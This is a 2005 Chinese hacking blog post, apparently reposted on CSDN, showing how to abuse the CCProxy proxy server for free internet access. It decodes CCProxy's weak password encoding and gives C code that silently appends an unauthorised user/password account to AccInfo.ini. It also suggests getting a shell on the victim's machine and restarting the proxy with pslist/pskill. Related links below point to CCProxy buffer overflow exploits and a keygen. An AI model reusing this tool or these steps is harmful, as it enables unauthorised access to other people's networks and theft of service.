利用CCproxy漏洞实现免费上网

转载 2005年04月30日 02:06:00
最近网络太乱啦,都不不怎么说,艾!不过最近漏洞出来的也不少,就光光MS都出来一大堆,呵呵,就连一个代理的小小软件都会有漏洞,呵呵!有漏洞就好,大家可以玩玩嘛!刚刚出来了个isno大哥发现的Ccproxy漏洞,goldsun写出来的软件Ccpxdown.exe的软件,有的玩,呵呵,不过今天我要写的不是这个,是我自己发现的一些东西,其实没什么技术性!
大家都知道ccproxy这个小软件吧!这个软件在我们学校比较流行,用代理的,基本上都是这个,呵呵,估计大家所在的学校和小区的局域网也是一样吧!那今天就让我给大家介绍这个软件:
大家打开ccproxy的目录,只要大家以前配置个帐户,那么在其下面就会有个AccInfo.ini的文件,这个就是帐户配置文件,现在给大家分析一下:
首先让大家看看一个典型的AccInfo.ini文件,代码如下:
[System]
UserCount=3   -----------这里是帐户的个数
AuthModel=1   ----------1代表允许部分
AuthType=2   ---------允许的连接模式的个数
TimeScheduleCount=0
WebFilterCount=0
[User001]
UserName=User-001
Password=
MACAddress=
IPAddressLow=219.216.100.1
IPAddressHigh=219.216.100.1
ServiceMask=254
MaxConn=-1
BandWidth=-1
WebFilter=-1
TimeSchedule=-1
EnableUserPassword=0
EnableIPAddress=1
EnableMACAddress=0
[User002]
UserName=User-001
Password=898884883
MACAddress=
IPAddressLow=0.0.0.0
IPAddressHigh=0.0.0.0
ServiceMask=254
MaxConn=-1
BandWidth=-1
WebFilter=-1
TimeSchedule=-1
EnableUserPassword=1
EnableIPAddress=0
EnableMACAddress=0
大家看到上面注释的部分了吗?
我要修改的也是这个地方!先来解释这个[AuthType=2   ----的接模式的个数]这里假如你的CCPROXY只用一种验证模式,那么它就是1,假如你还有其他验证模式,比如用户/密码,MAC地址,...,的话那么Auth Type就会变化使等他的数字与你的验证模式种类数相同!
经过我做实验知道,只要我们修改:UserCount=3 AuthModel=1 AuthType=2这三个地方,还有在下面在添加一些代码,那么重起CCPROXY后,帐户就会添加成功了!但是大家要注意到这些地方,想[User-00x]的地方,有多少个用户,[User-00x]中的x就是多少,否则将会失败!还有就是假如我们添加代码成功后,必须重启动CCPROXY,我们添加的帐户才会生效!
好了现在我们来添加代码,我们要在CCPROXY里新增一个新的用户,那么我们就可以在后添加上如下代码:
[User00x]
UserName=User-001
Password=898884883
MACAddress=
IPAddressLow=0.0.0.0
IPAddressHigh=0.0.0.0
ServiceMask=254
MaxConn=-1
BandWidth=-1
WebFilter=-1
TimeSchedule=-1
EnableUserPassword=1
EnableIPAddress=0
EnableMACAddress=0
这段代码是什么意思呢?EnableUserPassword=1-----表示以用户/密码的验证模式;
EnableIPAddress=0----------0表示不是这种模式,也就是不是IP地址验证模式;
EnableMACAddress=0----------0表示不是这种模式,也就是不是MAC地址验证;当然还有很多种,我就不一一介绍了!
UserName=User-001----------------用户名!
Password=898884883----------------密码!
那898 884 883表示什么呢?它表示的就是est!
我现在列举一些例子:
1------950
2------949

9------942
a------902
A------934
a ------902
b ------901
c ------900
d ------899
z ------877
大家看到这些应该知道了吧!950代表1,949代表2,依次递减!
902代表a,901代表b,依次递减,大写的字母比小写字母大32;
现在你就知道898884883代表的是est了吧!呵呵,大家也可以自己配置!
好了说到这里,我们的发现的介绍也就基本完了!
那么我们如果程序来添加一个新的帐户呢?(下面是我自己写的C代码,代码都没有进行任何的优化,希望大家不要笑)
#include <stdio.h>
main()
{int c=0,user,model,i;
FILE*fp;
clrscr();
fp=fopen("AccInfo.ini","r+");
while(c!=44)
{getc(fp);
c++;
if(c==19){ user=getc(fp);
      printf("nthe total user is:%cn",user);
      }
if(c==41){ model=getc(fp);
      printf("nthe curent model is:%cn",model);

      }
}
fseek(fp,20,0);
putc(++user,fp);
fseek(fp,45,0);
putc(++model,fp);
fclose(fp);
fp=fopen("AccInfo.ini","r");
c=0;
while(c!=44)
{putchar(getc(fp));
c++;
}
fclose(fp);
fp=fopen("AccInfo.ini","r+");
fseek(fp,0,2);
fputs("[User004]n",fp);
fclose(fp);
fp=fopen("AccInfo.ini","r+");
fseek(fp,0,2);
fputs("UserName=User-001n",fp);
fclose(fp);
fp=fopen("AccInfo.ini","r+");
fseek(fp,0,2);
fputs("Password=898884883n",fp);
fclose(fp);
fp=fopen("AccInfo.ini","r+");
fseek(fp,0,2);
fputs("MACAddress=n",fp);
fclose(fp);
fp=fopen("AccInfo.ini","r+");
fseek(fp,0,2);
fputs("IPAddressLow=0.0.0.0n",fp);
fclose(fp);
fp=fopen("AccInfo.ini","r+");
fseek(fp,0,2);
fputs("IPAddressHigh=0.0.0.0n",fp);
fclose(fp);
fp=fopen("AccInfo.ini","r+");
fseek(fp,0,2);
fputs("ServiceMask=254n",fp);
fclose(fp);
fp=fopen("AccInfo.ini","r+");
fseek(fp,0,2);
fputs("MaxConn=-1n",fp);
fclose(fp);
fp=fopen("AccInfo.ini","r+");
fseek(fp,0,2);
fputs("BandWidth=-1n",fp);
fclose(fp);
fp=fopen("AccInfo.ini","r+");
fseek(fp,0,2);
fputs("WebFilter=-1n",fp);
fclose(fp);
fp=fopen("AccInfo.ini","r+");
fseek(fp,0,2);
fputs("TimeSchedule=-1n",fp);
fclose(fp);
fp=fopen("AccInfo.ini","r+");
fseek(fp,0,2);
fputs("EnableUserPassword=1n",fp);
fclose(fp);
fp=fopen("AccInfo.ini","r+");
fseek(fp,0,2);
fputs("EnableIPAddress=0n",fp);
fclose(fp);
fp=fopen("AccInfo.ini","r+");
fseek(fp,0,2);
fputs("EnableMACAddress=0n",fp);
fclose(fp);
fp=fopen("AccInfo.ini","r+");
fseek(fp,-237L,2);
putc(user,fp);
fclose(fp);
}
用TC或者VC都能编译出来!
编译出来后大家可以放到CCPROXY的目录下运行,看看是不是多了个新的帐户!验证形式:用户/密码
  用户名:User-001
  密码 :est
其实作者本来设想的这个小东西应该具有如下功能的:
搜索系统进程中是否有CCPRXOY,如果没有提示错误!
并搜索CCPROXY所在的目录,
杀死Ccproxy
添加帐户;
在重起CCproxy
但是现在作者只写出了添加帐户的代码,其他的没时间去写了!大家可以自己发挥!剩余的代码,在E。S。T 的BBS[http://www.eviloctal.com/forum/]上都有,作者是风泽[E.S.T]写的代码,大家可以自己去看!如果能把这个小软件完成的话,结和isno大哥发现goldsun大哥写的CCPXDOWN.EXE,那么实现免费上网已经不是什么难题了!
其实,大家想玩的话,不用我告诉你方法你都知道,只要大家拿到对方的一个shell上传到对方的 CCPOXY目录运行,结和pslist.exe和pskill.exe,也能先来玩玩!

PCMan FTP Server缓冲区溢出漏洞分析与利用

简要介绍这个软件是台湾国立阳明大学医学系的一个学生在大四的时候写的,这个漏洞是有CVE的(CVE-2013-4730),软件应该还挺普及的,这是一个缓冲区溢出漏洞 具体exp可以点这里 实验用po...
  • u012763794
  • u012763794
  • 2017年03月26日 21:15
  • 2341

Myeclipse 内存溢出设置ini文件无效如何解决

在重复修改myeclipse.ini  文件内容多次无效后  后面将Xmx改至1024m,问题解决了,再也不报内存不够的异常了  -vmargs  -Xms128M  -Xmx1024m...
  • u012307002
  • u012307002
  • 2014年05月11日 16:21
  • 1186

缓冲区溢出漏洞攻击演示实验

实验内容: 分析缓冲区溢出漏洞,利用CCProxy 6.2的这个缓冲区溢出漏洞,利用ping命令向其发送一个长的字符串,溢出局部变量,覆盖RET的位置,从而实现程序跳转到自己想要让其执行的程序上...
  • ajfgurjfmvvlsfkjglkh
  • ajfgurjfmvvlsfkjglkh
  • 2015年10月07日 09:44
  • 3187

CCProxy 6.2 溢出漏洞分析

操作系统:Microsoft windows XP SP3 溢出软件:CCPROXY            http://pan.baidu.com/s/1pJI0loZ   CCProxy...
  • daoyikong
  • daoyikong
  • 2014年04月03日 12:01
  • 1485

整合攻击代码

#!/usr/bin/python #coding=utf-8 import ftplib import optparse import time #实现攻击 def attack(usernam...
  • zwlww1
  • zwlww1
  • 2018年01月09日 15:16
  • 31

warftp和ccproxy 缓冲区溢出攻击

  • 2013年12月17日 15:43
  • 22.33MB
  • 下载

内网服务器通过CCproxy代理上网(…

CCproxy简单的使用方法 目前,由于经常搭建环境,但是局方的机器一般为了安全考虑,不能链接外网,那么就会造成在linux机器中的一些便捷操作无法使用,比如:通过yum源更新或者安装软件。 CCpo...
  • blueyan163
  • blueyan163
  • 2017年03月31日 18:12
  • 924

linux使用代理服务器上网

有时,某个服务器无法联网。想联网的话,可以通过代理服务器。 下载一个ccproxy,安装完成后,打开该软件,点击‘设置’: 可以看到其端口: 在linux服务器连接: expo...
  • YABIGNSHI
  • YABIGNSHI
  • 2016年10月10日 18:12
  • 1493

CCProxy v6.2

放了很多天了,一直想写一下。以Telnet的方式登录CCProxy,输入ping 2000个c,CCProxy报错退出。核心部分:430300: sub esp,430h          //函数预...
  • CHUZF
  • CHUZF
  • 2007年10月05日 20:26
  • 330

CCProxy 8 Keygen

  • 2016年02月24日 13:25
  • 1.7MB
  • 下载
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:利用CCproxy漏洞实现免费上网
举报原因:
原因补充:

(最多只允许输入30个字)